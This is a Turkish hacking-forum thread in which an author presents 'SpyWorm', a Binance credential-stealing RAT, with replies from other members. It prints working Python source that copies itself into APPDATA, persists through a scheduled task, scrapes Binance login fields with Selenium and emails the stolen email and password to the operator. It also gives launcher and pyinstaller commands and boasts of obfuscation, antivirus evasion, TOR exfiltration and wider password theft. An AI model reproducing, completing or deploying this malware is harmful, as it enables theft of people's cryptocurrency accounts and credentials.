SpyWorm - Binance RAT

Merhabalar,

Beğeni ve yorum isterim çünkü tamamen binance platformu için bir rat yazıyorum. Dosyaları henüz paylaşamıyorum yapım aşamasında ama tüm işleyişi ve sistemi size bildireyim.

DETAYLAR

1- Antivirüsler tarafından tespit edilmeyecek (Kısa sürede olsa yapılmayacak)
Kısa diyorum çünkü içinizden birçok kişi dosyayı taratacak, ya da kurbanlar taratacak ve en sonunda işaret koyulacak.
Not! Şu an da kullandığım lisanslı Kaspersky Premium tespit edemedi. Bunu yaptım ve tekrar şifrelemeyi değiştirdim.
Çünkü bir defa taranırsa artık geri dönüş olmaz amatör bir yazılımcı değilim.

2- Yazılım varsayılan olarak olmayan bir mail adresine yönlendirme yapıyor ([email protected]) bu adresi siz değiştireceksiniz.
Neden böyle bir adres koydum? Alıntı olmadı ve Türkiye'de ilk defa bu forumda olduğu ve paylaşılacağı için. Siz değiştirip kendi mail adresinizi gireceksiniz.

3- Karmaşık bir yapı yok, sizin kullanmanız gereken bir exe dosyası da yok. Karşı tarafa ''CMD'' ya da ''EXE'' olarak dosyayı atıyorsunuz. Dosya silinse dahi çalışmaya devam ediyor. Sistem her başladığında otomatik açılıyor. Fakat aktif olmuyor. Bilgisayarda yaptığı hiçbir işlemi kayıt etmiyor. Şifreleri çalmaya çalışmıyor, bilgileri aktarmıyor, ekranı izlemiyor ya da herhangi bir veri çalma durumu yok. Kullanıcı ne zaman binance.com/login URL adresini açarsa o zaman aktif oluyor. (Yani sadece BİNANCE üzerinde çalışıyor)

4- CMD olarak karşıya atmanız durumunda bilmeniz gereken karşı tarafta mutlaka Python yüklü olmalı. Gerekli bir kaç kütüphane daha var bunlar; ( selenium, smtplib ) kütüphaneleri.

5- EXE olarak iletim durumunda herhangi bir gereksinim yok Windows 10/11 olması yeterli.

6- Kodlama obfuscate edildi. Türkçe olarak; Kodları karmaşık hale getirdim okunması zor, parçalara bölündü bu da verilerde geçikmeye sebep olur ama sorun değil sonuçta hedef belli.

Burada sorun şu; Veriler anlık değil evet Binance şifresi, mail adresi size gelecek fakat SMS doğrulama ya da 2FA kısmında verisel gecikmeden dolayı başarısız olacak.

Not! Bunun içinde çözüm bulmaya çalışıyorum zaten gecikmesinin sebebi bu.

Şimdiden yorumlarınızı bekliyorum ya da önerilerinizi. @Ghost

 

Yapım aşamasındayım yorumlarda isteklerinizi belirtin. Aklıma gelmeyen olabilir, kesinlikle olmalı dediğiniz ne varsa yazın.

 

@Ghost Özellikle seni etiketliyorum.

Bu RAT için herkesin mail adresine ayrı ayrı yazmam lazım. Yani yorum atanlar mail adresini bırakmalı ben onun mail adresine uygun şekilde yeniden obfuscate etmem lazım böylece antivirüsler algılamayacak. Kısacası herkes yoruma bir mail adresi yazmalı ve ben o mail adresine özel yönlendirme olarak obfuscate edip dcy yapıp dosyayı vermem lazım. (Kesin çözüm bu)

Genel olarak paylaşım yaparsam şifreleme de bir yere kadar algılıyor çünkü ve tek kullanımlık olacak.

Yani bir kişi buraya mail adresini yazacak ben ona uygun dosyayı obfuscate edip atacağım, attığım dosyayı sadece 1 kurbanına yollayabilecek.
2-3-4 diye herkese atarsa dosya patlar!

Atılan dosyayı kendisi açarsa mail adresine kendi binance bilgileri gider

 

İzleme kodu (Açık Kaynak)

import os import shutil import smtplib from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart import time # Kendini sistem klasörüne kopyalama def self_copy(): target_path = os.path.join(os.getenv('APPDATA'), 'system_service.py') if not os.path.exists(target_path): shutil.copy(__file__, target_path) # Görev zamanlayıcıya ekleme def add_to_startup(): target_path = os.path.join(os.getenv('APPDATA'), 'system_service.py') command = f'schtasks /create /tn "SystemService" /tr "pythonw {target_path}" /sc onlogon /f' os.system(command) # Binance giriş bilgilerini izleme def monitor_binance_login(): driver = webdriver.Chrome() driver.get("https://www.binance.com/login") while True: try: email_field = driver.find_element(By.ID, "email") password_field = driver.find_element(By.ID, "password") email = email_field.get_attribute("value") password = password_field.get_attribute("value") if email and password: log_to_file(email, password) send_email_report(email, password) time.sleep(10) # Gereksiz döngüyü önlemek için bekleme süresi except Exception as e: print("Waiting for login form...") time.sleep(2) # Giriş bilgilerini dosyaya kaydetme def log_to_file(email, password): with open("binance_log.txt", "a") as log_file: log_file.write(f"Email: {email}, Password: {password}\n") # E-posta rapor gönderimi def send_email_report(email, password): sender_email = "[COLOR=rgb(184, 49, 47)]gönderici e-mail adresini yazın forum[/COLOR]" receiver_email = "[COLOR=rgb(184, 49, 47)][email protected][/COLOR]" (Alıcı mail adresi) password_email = "[COLOR=rgb(184, 49, 47)]gönderici e-mail şifresini yazın forum[/COLOR]" subject = "Binance Login Details" body = f"Email: {email}\nPassword: {password}" msg = MIMEMultipart() msg['From'] = sender_email msg['To'] = receiver_email msg['Subject'] = subject msg.attach(MIMEText(body, 'plain')) try: with smtplib.SMTP("smtp.your-email-provider.com", 587) as server: server.starttls() server.login(sender_email, password_email) server.sendmail(sender_email, receiver_email, msg.as_string()) print("Email sent successfully!") except Exception as e: print(f"Error sending email: {e}") # Script başlangıcı if __name__ == "__main__": self_copy() add_to_startup() monitor_binance_login()

CMD KOMUTLARI

@echo off set TARGET_PATH=%appdata%\system_service.py pythonw %TARGET_PATH% exit

INSTALLER KOMUTU

pyinstaller --onefile --noconsole spyworm.py

 

Eline sağlık

 

 

Proje... Devam etmekte exe çalışmasına geçtim

 

Kullanım PDF

 

Antivirüsler algıladığında tekrardan obfuscate etmem gerekir fakat şuan için antivirüsler algılamıyor.

Sizden ricam dosyayı indirip taratmanızdır.

 

Geliştirmeye devam ediyorum DOM komutları ekliyorum.


from selenium import webdriver driver = webdriver.Chrome() driver.get("https://www.binance.com/login") email_field = driver.find_element(By.ID, "email") password_field = driver.find_element(By.ID, "password") email_value = email_field.get_attribute("value") password_value = password_field.get_attribute("value")

 

Edit: AES şifreleme ve TOR ağına bağlanacak bu sayede verilerde yavaşlık olacak ama güvenlik en üst düzeye çıkacak.
Bu güvenlik ve obfuscate işlemleri sayesinde de antivirüsler uzun bir süre algılayamayacak.

(İlk algılama ilk veri aldığında olur ama veri alınmış olur bir defa)

Kısacası modemi kucaklayıp götürdükden sonra antivirüs düüttt dikkat virüs var diyecek.

 

VIRUSTOTAL

https://www.virustotal.com/gui/url/4aef5b99b64cd39d6d4e80ce0f81430ad825f657c52860018ee702976085cd3f

 

Allah önce senin sonra bizim yardımcımız olsun

forumda böyle şeyler paylaş çok ilgi çekici gözüküyor şey gibi karşıdan bakıyorsun cips yanına bir gidiyorsun bildiğin patates

Daha dur alay etmelik değil bir bitirelim sonucu bir görelim. Ekleyeceğim çok şey var devam ediyorum.

 

Alay etme yok devam bitir tamamla bu tip programlar ilgi çekicidir her zaman forumu renkli kılar hiç paylaşılmamasındansa paylaşılmasını yeğlerim
Üyeleri ratlamayın kafi kolay gelsin

@Raquela

Üyeler de dikkatli olsun Şaka bir tarafa panel de oluşturuyorum. Denemeler yaptım sorun yok fake index üzerinde testler yaptım veri alıyor. Görsel biraz kötü olacak ama geliştiririz önemli olan antivirüslerin çaresiz kalmasıydı kaldı.

 

Ek olarak açık kaynak olarak kodları verdim içinde şüphesi olan araştırsın. Dosyayı da verdim virüstotal sonuçlarını da verdim. Güncel olarak şuan bu dosya YAKALANMIYOR!

NOT! Fakat geliştirmeye devam ediyoruz paylaşılan sadece TASLAK!

 

İnstagram, Facebook, Twitter (X), Gmail, Hotmail, Binance TR, Binance Global ve tüm kayıtlı Chrome şifreleri olarak güncelledim.

Henüz bu aşamada da tespit edilmedi.

 

Şu an ki aşama; Dosya RAM üzerinde çalışacak.

 

Şu an ki aşama; Dosya RAM üzerinde çalışacak.

kolay gelsin hocam sonuç güzel olacak gibi gözüküyor

 

kolay gelsin hocam sonuç güzel olacak gibi gözüküyor

Güzel olacak değil oldu zaten ama biraz daha üzerinde çalışıyorum. Taslak verdim zaten başka geliştiriciler varsa belki oynarlar üzerinde diye açık kaynak kodlu verdim